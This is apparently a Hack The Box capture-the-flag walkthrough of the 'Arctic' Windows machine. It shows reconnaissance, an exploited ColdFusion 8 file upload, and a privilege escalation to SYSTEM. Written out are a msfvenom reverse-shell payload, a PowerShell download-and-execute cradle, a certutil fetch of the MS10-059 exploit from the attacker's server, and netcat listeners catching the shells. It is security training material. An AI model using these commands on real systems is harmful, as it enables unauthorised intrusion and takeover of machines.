Arctic
Introduction:
Recon
1nmap -sS -sV -sC -T4 -O -oN nmap.arctic.txt 10.10.10.11
2Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-01 08:04 EST
3Nmap scan report for 10.10.10.11
4Host is up (0.014s latency).
5Not shown: 997 filtered ports
6PORT STATE SERVICE VERSION
7135/tcp open msrpc Microsoft Windows RPC
88500/tcp open fmtp?
949154/tcp open msrpc Microsoft Windows RPC
10Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
11Device type: general purpose|phone|specialized
12Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
13OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
14Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
15No exact OS matches for host (test conditions non-ideal).
16Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
17
18OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
19Nmap done: 1 IP address (1 host up) scanned in 137.89 seconds
20
Enumeration
1root@kinetic:~# searchsploit coldfusion 8
2-------------------------------------------------------------------------------------------------------- ---------------------------------
3 Exploit Title | Path
4-------------------------------------------------------------------------------------------------------- ---------------------------------
5Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting | cfm/webapps/36067.txt
6Adobe ColdFusion - Directory Traversal | multiple/remote/14641.py
7Adobe ColdFusion - Directory Traversal (Metasploit) | multiple/remote/16985.rb
8Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution | windows/remote/43993.py
9Adobe ColdFusion 2018 - Arbitrary File Upload | multiple/webapps/45979.txt
10Adobe ColdFusion 9 - Administrative Authentication Bypass | windows/webapps/27755.txt
11Adobe ColdFusion < 11 Update 10 - XML External Entity Injection | multiple/webapps/40346.py
12Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting | cfm/webapps/33170.txt
13Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site S | cfm/webapps/33167.txt
14Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting | cfm/webapps/33169.txt
15Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting | cfm/webapps/33168.txt
16Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution | multiple/remote/19093.txt
17Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Decrypt Pages | windows/local/19220.c
18ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) | cfm/webapps/16788.rb
19ColdFusion 9-10 - Credential Disclosure | multiple/webapps/25305.py
20ColdFusion MX - Missing Template Cross-Site Scripting | cfm/remote/21548.txt
21ColdFusion Scripts Red_Reservations - Database Disclosure | asp/webapps/7440.txt
22Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure | multiple/remote/22867.pl
23-------------------------------------------------------------------------------------------------------- ---------------------------------
24Shellcodes: No Results
25
26
27Intersting exploits are -
281. cfm/webapps/16788.rb
292. windows/webapps/27755.txt (Note sure if this applies to coldfusion 8.0)
30
q
Exploitation
(py2) root@kinetic:…/hackthebox/arctic/data# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.25 LPORT=4444 -f raw > shell.jsp Payload size: 1497 bytes (py2) root@kinetic:.
(py2) root@kinetic:…/hackthebox/arctic/data# python ./http_arb_file_upload.py arctic.htb 8500 ./shell.jsp Sending payload… Successfully uploaded payload! Find it at http://arctic.htb:8500/userfiles/file/CS8JD1A7.jsp (py2) root@kinetic:…/hackthebox/arctic/data#
eneloop@kinetic:…/hackthebox/arctic/data$ nc -lvnp 4444 listening on [any] 4444 … connect to [10.10.14.25] from (UNKNOWN) [10.10.10.11] 49339 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\runtime\bin>
powershell IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.14.25:8000/mini-reverse.ps1’)
1eneloop@kinetic:.../hackthebox/arctic/data$ nc -lvnp 4455
2listening on [any] 4455 ...
3connect to [10.10.14.25] from (UNKNOWN) [10.10.10.11] 49393
4whoami
5arctic\tolis
6
7dir
8
9
10 Directory: C:\ColdFusion8\runtime\bin
11
12
13cd Users
14dir
15
16
17 Directory: C:\Users
18
19
20Mode LastWriteTime Length Name
21---- ------------- ------ ----
22d---- 22/3/2017 8:10 μμ Administrator
23d-r-- 14/7/2009 7:57 πμ Public
24d---- 22/3/2017 9:00 μμ tolis
25
26
27
28cd tolis
29dir
30
31
32 Directory: C:\Users\tolis
33
34
35Mode LastWriteTime Length Name
36---- ------------- ------ ----
37d-r-- 22/3/2017 9:00 μμ Contacts
38d-r-- 22/3/2017 9:00 μμ Desktop
39d-r-- 22/3/2017 9:00 μμ Documents
40d-r-- 22/3/2017 9:00 μμ Downloads
41d-r-- 22/3/2017 9:00 μμ Favorites
42d-r-- 22/3/2017 9:00 μμ Links
43d-r-- 22/3/2017 9:00 μμ Music
44d-r-- 22/3/2017 9:00 μμ Pictures
45d-r-- 22/3/2017 9:00 μμ Saved Games
46d-r-- 22/3/2017 9:00 μμ Searches
47d-r-- 22/3/2017 9:00 μμ Videos
48
49
50
51cd Desktop
52dir
53
54
55 Directory: C:\Users\tolis\Desktop
56
57
58Mode LastWriteTime Length Name
59---- ------------- ------ ----
60-ar-- 22/3/2017 9:01 μμ 32 user.txt
61
62
63
64type user.txt
65
Post-exploit/PrivEsc
1
2sysinfo
3
4systeminfo
5
6Host Name: ARCTIC
7OS Name: Microsoft Windows Server 2008 R2 Standard
8OS Version: 6.1.7600 N/A Build 7600
9OS Manufacturer: Microsoft Corporation
10OS Configuration: Standalone Server
11OS Build Type: Multiprocessor Free
12Registered Owner: Windows User
13Registered Organization:
14Product ID: 55041-507-9857321-84451
15Original Install Date: 22/3/2017, 11:09:45 πμ
16System Boot Time: 3/1/2021, 12:25:54 πμ
17System Manufacturer: VMware, Inc.
18System Model: VMware Virtual Platform
19System Type: x64-based PC
20Processor(s): 2 Processor(s) Installed.
21 [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
22 [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
23BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
24Windows Directory: C:\Windows
25System Directory: C:\Windows\system32
26Boot Device: \Device\HarddiskVolume1
27System Locale: el;Greek
28Input Locale: en-us;English (United States)
29Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
30Total Physical Memory: 1.023 MB
31Available Physical Memory: 223 MB
32Virtual Memory: Max Size: 2.047 MB
33Virtual Memory: Available: 1.137 MB
34Virtual Memory: In Use: 910 MB
35Page File Location(s): C:\pagefile.sys
36Domain: HTB
37Logon Server: N/A
38Hotfix(s): N/A
39Network Card(s): 1 NIC(s) Installed.
40 [01]: Intel(R) PRO/1000 MT Network Connection
41 Connection Name: Local Area Connection
42 DHCP Enabled: No
43 IP address(es)
44 [01]: 10.10.10.11
45
46
1(py2) eneloop@kinetic:.../tools/winexploitsuggest/Windows-Exploit-Suggester$ ./windows-exploit-suggester.py -d ./2020-12-24-mssb.xls -i ./sysinfo.txt
2[*] initiating winsploit version 3.3...
3[*] database file detected as xls or xlsx based on extension
4[*] attempting to read from the systeminfo input file
5[+] systeminfo input file read successfully (utf-8)
6[*] querying database file for potential vulnerabilities
7[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
8[*] there are now 197 remaining vulns
9[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
10[+] windows version identified as 'Windows 2008 R2 64-bit'
11[*]
12[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
13[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
14[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
15[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
16[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
17[*]
18[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
19[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
20[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
21[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
22[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
23[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
24[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
25[*] done
26
1(py3) eneloop@kinetic:~/Downloads/WindowsExploits/MS10-059 - Chimichurri$ python -m http.server
2Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
310.10.10.11 - - [01/Jan/2021 10:23:43] "GET /MS10-059.exe HTTP/1.1" 200 -
410.10.10.11 - - [01/Jan/2021 10:30:30] "GET /MS10-059.exe HTTP/1.1" 200 -
510.10.10.11 - - [01/Jan/2021 10:30:33] "GET /MS10-059.exe HTTP/1.1" 200 -
6
1
2C:\Users\tolis\Downloads>certutil.exe -urlcache -f http://10.10.14.25:8000/MS10-059.exe C:\Users\tolis\Downloads\MS10-059.exe
3certutil.exe -urlcache -f http://10.10.14.25:8000/MS10-059.exe C:\Users\tolis\Downloads\MS10-059.exe
4**** Online ****
5CertUtil: -URLCache command completed successfully.
6
7C:\Users\tolis\Downloads>MS10-059.exe
8MS10-059.exe
9/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
10C:\Users\tolis\Downloads>MS10-059.exe 10.10.14.25 4455
11MS10-059.exe 10.10.14.25 4455
12/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>
13C:\Users\tolis\Downloads>
14
15
1eneloop@kinetic:.../content/lab/hackthebox$ nc -lvnp 4455
2listening on [any] 4455 ...
3
4
5
6connect to [10.10.14.25] from (UNKNOWN) [10.10.10.11] 49231
7Microsoft Windows [Version 6.1.7600]
8Copyright (c) 2009 Microsoft Corporation. All rights reserved.
9
10C:\Users\tolis\Downloads>
11C:\Users\tolis\Downloads>
12C:\Users\tolis\Downloads>
13C:\Users\tolis\Downloads>whoami
14whoami
15nt authority\system
16
17C:\Users\tolis\Downloads>cd ../../
18cd ../../
19
20C:\Users>cd Administrator
21cd Administrator
22
23C:\Users\Administrator>dir
24dir
25 Volume in drive C has no label.
26 Volume Serial Number is F88F-4EA5
27
28 Directory of C:\Users\Administrator
29
3022/03/2017 08:10 �� <DIR> .
3122/03/2017 08:10 �� <DIR> ..
3222/03/2017 07:47 �� <DIR> Contacts
3322/03/2017 09:02 �� <DIR> Desktop
3422/03/2017 07:47 �� <DIR> Documents
3522/03/2017 07:47 �� <DIR> Downloads
3622/03/2017 07:47 �� <DIR> Favorites
3722/03/2017 07:47 �� <DIR> Links
3822/03/2017 07:47 �� <DIR> Music
3922/03/2017 07:47 �� <DIR> Pictures
4022/03/2017 07:47 �� <DIR> Saved Games
4122/03/2017 07:47 �� <DIR> Searches
4222/03/2017 07:47 �� <DIR> Videos
43 0 File(s) 0 bytes
44 13 Dir(s) 33.183.096.832 bytes free
45
46C:\Users\Administrator>cd Desktop
47cd Desktop
48
49C:\Users\Administrator\Desktop>dir
50dir
51 Volume in drive C has no label.
52 Volume Serial Number is F88F-4EA5
53
54 Directory of C:\Users\Administrator\Desktop
55
5622/03/2017 09:02 �� <DIR> .
5722/03/2017 09:02 �� <DIR> ..
5822/03/2017 09:02 �� 32 root.txt
59 1 File(s) 32 bytes
60 2 Dir(s) 33.183.096.832 bytes free
61
62C:\Users\Administrator\Desktop>type root.txt
63type root.txt
64ceXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXffb90
65C:\Users\Administrator\Desktop>
Notes: